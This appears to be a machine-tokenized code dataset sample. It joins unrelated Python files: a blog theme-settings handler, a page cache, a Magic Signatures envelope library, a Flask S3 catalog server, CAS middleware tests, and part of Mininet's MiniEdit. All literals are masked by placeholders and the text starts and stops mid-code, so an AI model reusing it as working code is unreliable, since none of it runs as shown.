) <EOL> user . theme_title = self . 
get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> user . theme_link = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> user . theme_author = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> user . theme_author_link = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> user . extra_head_html = self . get_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT:\n>' ) <EOL> user . extra_body_end_html = self . get_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT:\n>' ) <EOL> user . logo = url_factory . clean_filename ( <EOL> self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> user . google_analytics = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> user . adult_content = int ( self . get_argument ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> user . tipjar = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> user . sidebar_ad = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> user . newsletter_endpoint = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> user . license = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> default_stylesheet = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> stylesheet = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> theme = url_factory . clean_filename ( self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> static_path = self . application . settings [ "<STR_LIT>" ] <EOL> theme = os . path . join ( static_path , os . path . dirname ( theme ) ) <EOL> user_path = os . path . join ( <EOL> self . application . settings [ "<STR_LIT>" ] , user . username ) <EOL> theme_path = os . path . join ( user_path , '<STR_LIT>' ) <EOL> current_theme_path = os . path . join ( theme_path , '<STR_LIT>' ) <EOL> compiled_stylesheet_path = os . path . join ( <EOL> current_theme_path , '<STR_LIT>' ) <EOL> default_stylesheet_path = os . path . join ( <EOL> current_theme_path , '<STR_LIT>' ) <EOL> if theme != current_theme_path : <EOL> if os . 
path . exists ( current_theme_path ) : <EOL> shutil . rmtree ( current_theme_path ) <EOL> shutil . copytree ( theme , current_theme_path ) <EOL> f = open ( compiled_stylesheet_path , '<STR_LIT:w>' ) <EOL> f . write ( stylesheet ) <EOL> f . close ( ) <EOL> f = open ( default_stylesheet_path , '<STR_LIT:w>' ) <EOL> f . write ( default_stylesheet ) <EOL> f . close ( ) <EOL> user . theme = compiled_stylesheet_path [ len ( <EOL> self . application . settings [ "<STR_LIT>" ] ) + <NUM_LIT:1> : ] <EOL> user . save ( ) <EOL> self . set_status ( <NUM_LIT> ) </s>
<s> import gzip <EOL> import os <EOL> import re <EOL> import shutil <EOL> from logic import url_factory <EOL> try : <EOL> from io import BytesIO <EOL> except ImportError : <EOL> from cStringIO import StringIO as BytesIO <EOL> EXTENSION = '<STR_LIT:html>' <EOL> def get_full_filename ( handler , url = None ) : <EOL> if not url : <EOL> url = handler . prefix + handler . breadcrumbs [ '<STR_LIT>' ] <EOL> elif not url . startswith ( handler . prefix ) : <EOL> url = handler . prefix + url <EOL> filename = url_factory . clean_filename ( url ) <EOL> path = os . path . join ( handler . application . settings [ "<STR_LIT>" ] , filename + <EOL> '<STR_LIT:.>' + EXTENSION ) <EOL> parent_directory = os . path . dirname ( path ) <EOL> if not os . path . isdir ( parent_directory ) : <EOL> os . makedirs ( parent_directory ) <EOL> return path <EOL> def add ( handler , content , rendered_content ) : <EOL> if not rendered_content : <EOL> return <EOL> try : <EOL> rendered_content += '<STR_LIT>' <EOL> full_path = get_full_filename ( handler , handler . content_url ( content ) ) <EOL> f = open ( full_path , '<STR_LIT:wb>' ) <EOL> f . write ( rendered_content ) <EOL> f . close ( ) <EOL> except Exception as ex : <EOL> pass <EOL> def remove ( handler , url = None ) : <EOL> try : <EOL> filename = get_full_filename ( handler , url ) <EOL> os . remove ( filename ) <EOL> if os . path . isdir ( filename [ : - len ( EXTENSION ) ] ) : <EOL> invalidate ( filename [ : - len ( EXTENSION ) ] ) <EOL> except : <EOL> pass <EOL> def invalidate ( cache_path ) : <EOL> try : <EOL> shutil . rmtree ( cache_path ) <EOL> except : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import base64 <EOL> import re <EOL> import sys <EOL> import time <EOL> try : <EOL> import xml . etree . ElementTree as et <EOL> except ImportError : <EOL> try : <EOL> import elementtree as et <EOL> except ImportError : <EOL> raise <EOL> import magicsigalg <EOL> _WHITESPACE_RE = re . compile ( r'<STR_LIT>' ) <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> Exception . __init__ ( self ) <EOL> def NormalizeUserIdToUri ( userid ) : <EOL> """<STR_LIT>""" <EOL> userid = userid . strip ( ) <EOL> if ( userid . startswith ( '<STR_LIT>' ) or <EOL> userid . startswith ( '<STR_LIT>' ) or <EOL> userid . startswith ( '<STR_LIT>' ) ) : <EOL> return userid <EOL> if userid . find ( '<STR_LIT:@>' ) > <NUM_LIT:0> : <EOL> return '<STR_LIT>' + userid <EOL> return '<STR_LIT>' + userid <EOL> def _GetElementByTagName ( e , ns , tag_name ) : <EOL> """<STR_LIT>""" <EOL> seq = e . getElementsByTagNameNS ( unicode ( ns ) , unicode ( tag_name ) ) <EOL> if seq . length == <NUM_LIT:0> : raise ValueError ( '<STR_LIT>' % tag_name ) <EOL> if seq . length > <NUM_LIT:1> : raise ValueError ( '<STR_LIT>' % <EOL> tag_name ) <EOL> return seq . item ( <NUM_LIT:0> ) <EOL> class KeyRetriever ( object ) : <EOL> """<STR_LIT>""" <EOL> def LookupPublicKey ( self , signer_uri ) : <EOL> if not signer_uri : <EOL> return None <EOL> return ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def LookupPrivateKey ( self , signer_uri ) : <EOL> """<STR_LIT>""" <EOL> return self . LookupPublicKey ( signer_uri ) <EOL> _ATOM_NS_URL = '<STR_LIT>' <EOL> _ME_NS_URL = '<STR_LIT>' <EOL> _ATOM_NS = '<STR_LIT>' % _ATOM_NS_URL <EOL> _ME_NS = '<STR_LIT>' % _ME_NS_URL <EOL> try : <EOL> __register_namespace = et . register_namespace <EOL> except AttributeError : <EOL> def __register_namespace ( prefix , uri ) : <EOL> et . 
_namespace_map [ uri ] = prefix <EOL> __register_namespace ( '<STR_LIT>' , _ATOM_NS_URL ) <EOL> __register_namespace ( '<STR_LIT>' , _ME_NS_URL ) <EOL> __register_namespace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class MagicEnvelopeProtocol ( object ) : <EOL> """<STR_LIT>""" <EOL> ENCODING = '<STR_LIT>' <EOL> key_retriever = KeyRetriever ( ) <EOL> def GetPrivateKey ( self , signer_uri ) : <EOL> """<STR_LIT>""" <EOL> return self . key_retriever . LookupPrivateKey ( signer_uri ) <EOL> def GetPublicKey ( self , signer_uri ) : <EOL> """<STR_LIT>""" <EOL> return self . key_retriever . LookupPublicKey ( signer_uri ) <EOL> def GetSignerURI ( self , data ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( data , et . ElementTree ) : <EOL> d = data <EOL> else : <EOL> d = et . ElementTree ( ) <EOL> data = data . encode ( '<STR_LIT:utf8>' ) if type ( data ) is unicode else data <EOL> d . _setroot ( et . XML ( data ) ) <EOL> auth_uris = d . getroot ( ) . findall ( _ATOM_NS + '<STR_LIT>' + _ATOM_NS + '<STR_LIT>' ) <EOL> for u in auth_uris : <EOL> return NormalizeUserIdToUri ( u . text ) <EOL> def IsAllowedSigner ( self , data , userid_uri ) : <EOL> """<STR_LIT>""" <EOL> return self . GetSignerURI ( data ) == userid_uri <EOL> def Verify ( self , env ) : <EOL> """<STR_LIT>""" <EOL> assert env [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> assert env [ '<STR_LIT>' ] == self . ENCODING <EOL> text = base64 . urlsafe_b64decode ( env [ '<STR_LIT:data>' ] . encode ( '<STR_LIT:utf-8>' ) ) <EOL> signer_uri = self . GetSignerURI ( text ) <EOL> verifier = magicsigalg . SignatureAlgRsaSha256 ( self . GetKeypair ( signer_uri ) ) <EOL> return verifier . Verify ( env [ '<STR_LIT:data>' ] , env [ '<STR_LIT>' ] ) <EOL> def GetSigningAlg ( self , signing_key ) : <EOL> """<STR_LIT>""" <EOL> if signing_key == '<STR_LIT>' : <EOL> signing_key = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return magicsigalg . 
SignatureAlgRsaSha256 ( signing_key ) <EOL> def GetVerifierAlg ( self , public_key ) : <EOL> """<STR_LIT>""" <EOL> return magicsigalg . SignatureAlgRsaSha256 ( public_key ) <EOL> def EncodeData ( self , raw_text_data , encoding ) : <EOL> """<STR_LIT>""" <EOL> if encoding != '<STR_LIT>' : <EOL> raise ValueError ( '<STR_LIT>' % encoding ) <EOL> return base64 . urlsafe_b64encode ( <EOL> unicode ( raw_text_data ) . encode ( '<STR_LIT:utf-8>' ) ) . encode ( '<STR_LIT:utf-8>' ) <EOL> def DecodeData ( self , encoded_text_data , encoding ) : <EOL> """<STR_LIT>""" <EOL> if encoding != '<STR_LIT>' : <EOL> raise ValueError ( '<STR_LIT>' % encoding ) <EOL> return base64 . urlsafe_b64decode ( encoded_text_data . encode ( '<STR_LIT:utf-8>' ) ) <EOL> def ParseData ( self , raw_text_data , mime_type ) : <EOL> """<STR_LIT>""" <EOL> if mime_type != '<STR_LIT>' : <EOL> raise ValueError ( '<STR_LIT>' % mime_type ) <EOL> d = et . ElementTree ( ) <EOL> raw_text_data = raw_text_data . encode ( '<STR_LIT:utf8>' ) if type ( raw_text_data ) is unicode else raw_text_data <EOL> d . _setroot ( et . XML ( raw_text_data ) ) <EOL> return d <EOL> def Parse ( self , textinput , mime_type = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> ns = '<STR_LIT>' <EOL> d = et . ElementTree ( ) <EOL> textinput = textinput . strip ( ) <EOL> textinput = textinput . encode ( '<STR_LIT:utf8>' ) if type ( textinput ) is unicode else textinput <EOL> d . _setroot ( et . XML ( textinput ) ) <EOL> if d . getroot ( ) . tag == _ATOM_NS + '<STR_LIT>' : <EOL> env_el = d . find ( _ME_NS + '<STR_LIT>' ) <EOL> elif d . getroot ( ) . tag == _ME_NS + '<STR_LIT>' : <EOL> env_el = d . getroot ( ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> def Squeeze ( s ) : <EOL> return re . sub ( _WHITESPACE_RE , '<STR_LIT>' , s ) <EOL> data_el = env_el . find ( _ME_NS + '<STR_LIT:data>' ) <EOL> return dict ( <EOL> data = Squeeze ( data_el . text ) , <EOL> encoding = env_el . 
findtext ( _ME_NS + '<STR_LIT>' ) , <EOL> data_type = data_el . get ( '<STR_LIT:type>' ) , <EOL> alg = env_el . findtext ( _ME_NS + '<STR_LIT>' ) , <EOL> sig = Squeeze ( env_el . findtext ( _ME_NS + '<STR_LIT>' ) ) , <EOL> ) <EOL> class EnvelopeError ( Error ) : <EOL> """<STR_LIT>""" <EOL> invalid_envelope = None <EOL> error_text = None <EOL> context = None <EOL> def __init__ ( self , envelope , err , context = None ) : <EOL> self . invalid_envelope = envelope <EOL> self . error_text = err <EOL> self . context = context <EOL> Error . __init__ ( self ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . error_text , self . invalid_envelope , self . context ) <EOL> class Envelope ( object ) : <EOL> """<STR_LIT>""" <EOL> _data = None <EOL> _data_type = None <EOL> _encoding = None <EOL> _alg = None <EOL> _sig = None <EOL> _parsed_data = None <EOL> _signer_uri = None <EOL> _signer_key = None <EOL> _init_timestamp = None <EOL> def __init__ ( self , <EOL> protocol = MagicEnvelopeProtocol ( ) , <EOL> ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . _protocol = protocol <EOL> self . _Initialize ( kwargs ) <EOL> if self . _sig : <EOL> self . _PerformVerification ( ) <EOL> elif self . _signer_key : <EOL> self . _Sign ( ) <EOL> else : <EOL> raise EnvelopeError ( self , '<STR_LIT>' ) <EOL> except EnvelopeError : <EOL> raise <EOL> self . _init_timestamp = time . time ( ) <EOL> def _Initialize ( self , kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . _mime_type = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . _document = kwargs . get ( '<STR_LIT>' , None ) <EOL> if self . _document : <EOL> fields = self . _protocol . Parse ( self . _document , self . _mime_type ) <EOL> kwargs . update ( fields ) <EOL> self . _data = kwargs . get ( '<STR_LIT:data>' , None ) <EOL> self . _data_type = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . _encoding = kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _alg = kwargs . 
get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _sig = kwargs . get ( '<STR_LIT>' , None ) <EOL> if not self . _data_type : <EOL> raise EnvelopeError ( self , '<STR_LIT>' ) <EOL> if self . _alg != '<STR_LIT>' : <EOL> raise EnvelopeError ( self , '<STR_LIT>' % <EOL> self . _alg ) <EOL> if self . _encoding != '<STR_LIT>' : <EOL> raise EnvelopeError ( self , '<STR_LIT>' % <EOL> self . _encoding ) <EOL> raw_data = kwargs . get ( '<STR_LIT>' , None ) <EOL> if raw_data : <EOL> assert self . _data_type <EOL> assert not self . _sig <EOL> assert not self . _data <EOL> assert '<STR_LIT>' in kwargs <EOL> assert '<STR_LIT>' in kwargs <EOL> self . _parsed_data = self . _protocol . ParseData ( raw_data , <EOL> self . _data_type ) <EOL> self . _data = self . _protocol . EncodeData ( raw_data , <EOL> self . _encoding ) <EOL> self . _signer_uri = kwargs [ '<STR_LIT>' ] <EOL> self . _signer_key = kwargs [ '<STR_LIT>' ] <EOL> elif self . _sig : <EOL> if not self . _data : <EOL> raise EnvelopeError ( self , '<STR_LIT>' ) <EOL> raw_data = self . _protocol . DecodeData ( self . _data , self . _encoding ) <EOL> else : <EOL> raise EnvelopeError ( self , '<STR_LIT>' ) <EOL> self . _parsed_data = self . _protocol . ParseData ( raw_data , self . _data_type ) <EOL> self . _init_timestamp = None <EOL> def Age ( self ) : <EOL> """<STR_LIT>""" <EOL> assert self . _init_timestamp <EOL> return self . _init_timestamp - time . time ( ) <EOL> def _Sign ( self ) : <EOL> """<STR_LIT>""" <EOL> assert self . _signer_uri <EOL> assert self . _signer_key <EOL> assert self . _protocol . IsAllowedSigner ( self . _parsed_data , self . _signer_uri ) <EOL> signature_alg = self . _protocol . GetSigningAlg ( self . _signer_key ) <EOL> self . _sig = signature_alg . Sign ( self . _data ) <EOL> self . _alg = signature_alg . GetName ( ) <EOL> assert signature_alg . Verify ( self . _data , self . _sig ) <EOL> def _PerformVerification ( self ) : <EOL> """<STR_LIT>""" <EOL> text = base64 . urlsafe_b64decode ( self . 
_data . encode ( '<STR_LIT:utf-8>' ) ) <EOL> self . _parsed_data = self . _protocol . ParseData ( text , self . _data_type ) <EOL> self . _signer_uri = self . _protocol . GetSignerURI ( self . _parsed_data ) <EOL> self . _signer_public_key = self . _protocol . GetPublicKey ( self . _signer_uri ) <EOL> verifier = self . _protocol . GetVerifierAlg ( self . _signer_public_key ) <EOL> if not verifier . Verify ( self . _data , self . _sig ) : <EOL> raise EnvelopeError ( self , '<STR_LIT>' ) <EOL> def ToXML ( self , fulldoc = True , indentation = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> assert self . _init_timestamp <EOL> if fulldoc : <EOL> template = '<STR_LIT>' <EOL> else : <EOL> template = '<STR_LIT>' <EOL> template += """<STR_LIT>""" <EOL> text = template % ( self . _encoding , <EOL> _ToPretty ( self . _data , <NUM_LIT:4> , <NUM_LIT> ) , <EOL> self . _alg , <EOL> _ToPretty ( self . _sig , <NUM_LIT:4> , <NUM_LIT> ) ) <EOL> indented_text = '<STR_LIT>' <EOL> for line in text . strip ( ) . split ( '<STR_LIT:\n>' ) : <EOL> indented_text += '<STR_LIT:U+0020>' * indentation + line + '<STR_LIT:\n>' <EOL> return indented_text <EOL> def ToAtom ( self , fulldoc = True , indentation = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> if not self . _parsed_data : <EOL> self . _parsed_data = self . _protocol . ParseData ( text , self . _data_type ) <EOL> d = self . _parsed_data <EOL> assert d . getroot ( ) . tag == _ATOM_NS + '<STR_LIT>' <EOL> prov_el = et . Element ( _ME_NS + '<STR_LIT>' ) <EOL> data_el = et . SubElement ( prov_el , _ME_NS + '<STR_LIT:data>' ) <EOL> data_el . set ( '<STR_LIT:type>' , self . _data_type ) <EOL> data_el . text = '<STR_LIT:\n>' + _ToPretty ( self . _data , indentation + <NUM_LIT:6> , <NUM_LIT> ) <EOL> et . SubElement ( prov_el , _ME_NS + '<STR_LIT>' ) . text = self . _encoding <EOL> et . SubElement ( prov_el , _ME_NS + '<STR_LIT>' ) . text = '<STR_LIT:\n>' + _ToPretty ( self . _sig , <EOL> indentation + <NUM_LIT:6> , <EOL> <NUM_LIT> ) <EOL> d . 
getroot ( ) . append ( prov_el ) <EOL> self . _PrettyIndent ( d . getroot ( ) , indentation / <NUM_LIT:2> ) <EOL> text = et . tostring ( d . getroot ( ) , encoding = '<STR_LIT:utf-8>' ) <EOL> indented_text = '<STR_LIT>' <EOL> for line in text . strip ( ) . split ( '<STR_LIT:\n>' ) : <EOL> if line . strip ( ) != '<STR_LIT>' : <EOL> indented_text += '<STR_LIT:U+0020>' * indentation + line + '<STR_LIT:\n>' <EOL> if fulldoc : <EOL> indented_text = ( '<STR_LIT>' + <EOL> indented_text ) <EOL> return indented_text <EOL> def GetData ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _protocol . Decode ( self . _data , self . _encoding ) <EOL> def GetParsedData ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . _parsed_data : <EOL> self . _parsed_data = self . _protocol . ParseData ( <EOL> self . _protocol . Decode ( self . _data ) , <EOL> self . _data_type ) <EOL> return self . _parsed_data <EOL> def GetDataWithProvenance ( self ) : <EOL> """<STR_LIT>""" <EOL> def GetParsedDataWithProvenance ( self ) : <EOL> """<STR_LIT>""" <EOL> def _PrettyIndent ( self , elem , level = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> i = "<STR_LIT:\n>" + level * "<STR_LIT:U+0020>" <EOL> if len ( elem ) : <EOL> if not elem . text or not elem . text . strip ( ) : <EOL> elem . text = i + "<STR_LIT:U+0020>" <EOL> if not elem . tail or not elem . tail . strip ( ) : <EOL> elem . tail = i <EOL> for elem in elem : <EOL> self . _PrettyIndent ( elem , level + <NUM_LIT:1> ) <EOL> if not elem . tail or not elem . tail . strip ( ) : <EOL> elem . tail = i <EOL> else : <EOL> if level and ( not elem . tail or not elem . tail . strip ( ) ) : <EOL> elem . tail = i <EOL> def _ToPretty ( text , indent , linelength ) : <EOL> """<STR_LIT>""" <EOL> tl = linelength - indent <EOL> output = '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , len ( text ) , tl ) : <EOL> if output : <EOL> output += '<STR_LIT:\n>' <EOL> output += '<STR_LIT:U+0020>' * indent + text [ i : i + tl ] <EOL> return output </s>
<s> import os <EOL> import json <EOL> import base64 <EOL> import hmac , hashlib <EOL> from redis import Redis <EOL> from rq import Queue <EOL> from flask import Flask , request , abort , make_response , Response <EOL> from boto . s3 . connection import S3Connection <EOL> from zinc . catalog import ZincCatalogPathHelper <EOL> from zinc . services import ZincCatalog <EOL> from zinc . coordinators . redis import RedisCatalogCoordinator <EOL> from zinc . storages . aws import S3StorageBackend <EOL> from config import CONFIG <EOL> API_VERSION = '<STR_LIT:1.0>' <EOL> REDIS_URL = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> REDIS = Redis . from_url ( REDIS_URL ) <EOL> S3 = S3Connection ( CONFIG [ '<STR_LIT>' ] , CONFIG [ '<STR_LIT>' ] ) <EOL> Coordinator = RedisCatalogCoordinator ( redis = REDIS ) <EOL> Q = Queue ( connection = REDIS ) <EOL> Jobs = dict ( ) <EOL> Catalogs = dict ( ) <EOL> app = Flask ( __name__ ) <EOL> def get_catalog ( catalog_id ) : <EOL> catalog = Catalogs . get ( catalog_id ) <EOL> if catalog is None : <EOL> storage = S3StorageBackend ( <EOL> s3connection = S3 , <EOL> bucket = CONFIG [ '<STR_LIT>' ] , <EOL> prefix = catalog_id ) <EOL> catalog = ZincCatalog ( coordinator = Coordinator , storage = storage ) <EOL> Catalogs [ catalog_id ] = catalog <EOL> return catalog <EOL> @ app . after_request <EOL> def after_request ( response ) : <EOL> response . headers . add ( '<STR_LIT>' , API_VERSION ) <EOL> return response <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def catalog_index ( catalog_id ) : <EOL> return get_catalog ( catalog_id ) . get_index ( ) . to_bytes ( ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def manifest ( catalog_id , bundle , version = None ) : <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return get_catalog ( catalog_id ) . get_manifest ( bundle , version ) . to_bytes ( ) <EOL> if request . 
method == '<STR_LIT:POST>' : <EOL> catalog = get_catalog ( catalog_id ) <EOL> filelist = request . form [ '<STR_LIT>' ] <EOL> force = True <EOL> job = Q . enqueue ( catalog . update_bundle , bundle , filelist , force = force ) <EOL> Jobs [ job . id ] = job <EOL> return job . id <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def tag ( catalog_id , bundle , tag ) : <EOL> if request . method == '<STR_LIT>' : <EOL> catalog = get_catalog ( catalog_id ) <EOL> version = int ( request . form [ '<STR_LIT:version>' ] ) <EOL> catalog . update_distribution ( tag , bundle , version ) <EOL> if request . method == '<STR_LIT>' : <EOL> catalog = get_catalog ( catalog_id ) <EOL> catalog . delete_distribution ( tag , bundle ) <EOL> response = make_response ( ) <EOL> response . status_code = <NUM_LIT:200> <EOL> return response <EOL> def upload_key ( catalog_id , sha ) : <EOL> return catalog_id + '<STR_LIT>' + sha <EOL> def build_policy ( catalog_id , sha ) : <EOL> policy = dict ( ) <EOL> policy [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> policy [ '<STR_LIT>' ] = [ <EOL> { '<STR_LIT>' : CONFIG [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT:key>' : upload_key ( catalog_id , sha ) } , <EOL> ] <EOL> return policy <EOL> def base64_policy ( policy ) : <EOL> return base64 . b64encode ( json . dumps ( policy ) ) <EOL> def sign_policy ( policy64 ) : <EOL> signature = base64 . b64encode ( <EOL> hmac . new ( CONFIG [ '<STR_LIT>' ] , policy64 , hashlib . sha1 ) . digest ( ) ) <EOL> return signature <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> def upload ( catalog_id , sha ) : <EOL> catalog = get_catalog ( catalog_id ) <EOL> info = catalog . 
_get_file_info ( sha ) <EOL> if info is not None : <EOL> abort ( <NUM_LIT> , '<STR_LIT>' ) <EOL> return <EOL> policy = build_policy ( catalog_id , sha ) <EOL> policy64 = base64_policy ( policy ) <EOL> signature = sign_policy ( policy64 ) <EOL> response_data = dict ( ) <EOL> response_data [ '<STR_LIT>' ] = policy64 <EOL> response_data [ '<STR_LIT>' ] = signature <EOL> response_data [ '<STR_LIT>' ] = CONFIG [ '<STR_LIT>' ] <EOL> response_data [ '<STR_LIT:key>' ] = upload_key ( catalog_id , sha ) <EOL> js = json . dumps ( response_data ) <EOL> resp = Response ( js , status = <NUM_LIT:200> , mimetype = '<STR_LIT:application/json>' ) <EOL> return resp <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> port = int ( os . environ . get ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> app . run ( host = '<STR_LIT>' , port = port ) </s>
<s> from __future__ import absolute_import <EOL> from django . test import RequestFactory <EOL> from django . contrib . auth . models import AnonymousUser <EOL> from django_cas_ng . middleware import CASMiddleware <EOL> from django_cas_ng import views <EOL> def _process_view_with_middleware ( <EOL> middleware_cls , url , view_func ) : <EOL> middleware = middleware_cls ( ) <EOL> request_factory = RequestFactory ( ) <EOL> request = request_factory . get ( url ) <EOL> request . user = AnonymousUser ( ) <EOL> return middleware . process_view ( request , view_func , <EOL> view_args = ( ) , view_kwargs = { } ) <EOL> def test_root_as_cas_admin_prefix_with_cas_login ( monkeypatch , settings ) : <EOL> monkeypatch . setattr ( '<STR_LIT>' , <EOL> lambda func : "<STR_LIT>" ) <EOL> settings . CAS_ADMIN_PREFIX = "<STR_LIT:/>" <EOL> response = _process_view_with_middleware ( <EOL> CASMiddleware , '<STR_LIT>' , views . login ) <EOL> assert response is None <EOL> def test_root_as_cas_admin_prefix_with_cas_logout ( monkeypatch , settings ) : <EOL> monkeypatch . setattr ( '<STR_LIT>' , <EOL> lambda func : "<STR_LIT>" ) <EOL> settings . CAS_ADMIN_PREFIX = "<STR_LIT:/>" <EOL> response = _process_view_with_middleware ( <EOL> CASMiddleware , '<STR_LIT>' , views . logout ) <EOL> assert response is None </s>
<s> """<STR_LIT>""" <EOL> MINIEDIT_VERSION = '<STR_LIT>' <EOL> from optparse import OptionParser <EOL> from Tkinter import ( Frame , Label , LabelFrame , Entry , OptionMenu , Checkbutton , <EOL> Menu , Toplevel , Button , BitmapImage , PhotoImage , Canvas , <EOL> Scrollbar , Wm , TclError , StringVar , IntVar , <EOL> E , W , EW , NW , Y , VERTICAL , SOLID , CENTER , <EOL> RIGHT , LEFT , BOTH , TRUE , FALSE ) <EOL> from ttk import Notebook <EOL> from tkMessageBox import showerror <EOL> from subprocess import call <EOL> import tkFont <EOL> import tkFileDialog <EOL> import tkSimpleDialog <EOL> import re <EOL> import json <EOL> from distutils . version import StrictVersion <EOL> import os <EOL> import sys <EOL> from functools import partial <EOL> if '<STR_LIT>' in os . environ : <EOL> sys . path = os . environ [ '<STR_LIT>' ] . split ( '<STR_LIT::>' ) + sys . path <EOL> from mininet . log import info , setLogLevel <EOL> from mininet . net import Mininet , VERSION <EOL> from mininet . util import netParse , ipAdd , quietRun <EOL> from mininet . util import buildTopo <EOL> from mininet . util import custom , customClass <EOL> from mininet . term import makeTerm , cleanUpScreens <EOL> from mininet . node import Controller , RemoteController , NOX , OVSController <EOL> from mininet . node import CPULimitedHost , Host , Node <EOL> from mininet . node import OVSSwitch , UserSwitch <EOL> from mininet . link import TCLink , Intf , Link <EOL> from mininet . cli import CLI <EOL> from mininet . moduledeps import moduleDeps <EOL> from mininet . topo import SingleSwitchTopo , LinearTopo , SingleSwitchReversedTopo <EOL> from mininet . topolib import TreeTopo <EOL> print '<STR_LIT>' + VERSION <EOL> MININET_VERSION = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , VERSION ) <EOL> if StrictVersion ( MININET_VERSION ) > StrictVersion ( '<STR_LIT>' ) : <EOL> from mininet . 
node import IVSSwitch <EOL> TOPODEF = '<STR_LIT:none>' <EOL> TOPOS = { '<STR_LIT>' : lambda : SingleSwitchTopo ( k = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : LinearTopo , <EOL> '<STR_LIT>' : SingleSwitchReversedTopo , <EOL> '<STR_LIT>' : SingleSwitchTopo , <EOL> '<STR_LIT:none>' : None , <EOL> '<STR_LIT>' : TreeTopo } <EOL> CONTROLLERDEF = '<STR_LIT>' <EOL> CONTROLLERS = { '<STR_LIT>' : Controller , <EOL> '<STR_LIT>' : OVSController , <EOL> '<STR_LIT>' : NOX , <EOL> '<STR_LIT>' : RemoteController , <EOL> '<STR_LIT:none>' : lambda name : None } <EOL> LINKDEF = '<STR_LIT:default>' <EOL> LINKS = { '<STR_LIT:default>' : Link , <EOL> '<STR_LIT>' : TCLink } <EOL> HOSTDEF = '<STR_LIT>' <EOL> HOSTS = { '<STR_LIT>' : Host , <EOL> '<STR_LIT>' : custom ( CPULimitedHost , sched = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : custom ( CPULimitedHost , sched = '<STR_LIT>' ) } <EOL> class InbandController ( RemoteController ) : <EOL> "<STR_LIT>" <EOL> def checkListening ( self ) : <EOL> "<STR_LIT>" <EOL> return <EOL> class CustomUserSwitch ( UserSwitch ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , name , dpopts = '<STR_LIT>' , ** kwargs ) : <EOL> UserSwitch . __init__ ( self , name , ** kwargs ) <EOL> self . switchIP = None <EOL> def getSwitchIP ( self ) : <EOL> "<STR_LIT>" <EOL> return self . switchIP <EOL> def setSwitchIP ( self , ip ) : <EOL> "<STR_LIT>" <EOL> self . switchIP = ip <EOL> def start ( self , controllers ) : <EOL> "<STR_LIT>" <EOL> UserSwitch . start ( self , controllers ) <EOL> if self . switchIP is not None : <EOL> if not self . inNamespace : <EOL> self . cmd ( '<STR_LIT>' , self , self . switchIP ) <EOL> else : <EOL> self . cmd ( '<STR_LIT>' , self . switchIP ) <EOL> class LegacyRouter ( Node ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , name , inNamespace = True , ** params ) : <EOL> Node . __init__ ( self , name , inNamespace , ** params ) <EOL> def config ( self , ** _params ) : <EOL> if self . intfs : <EOL> self . 
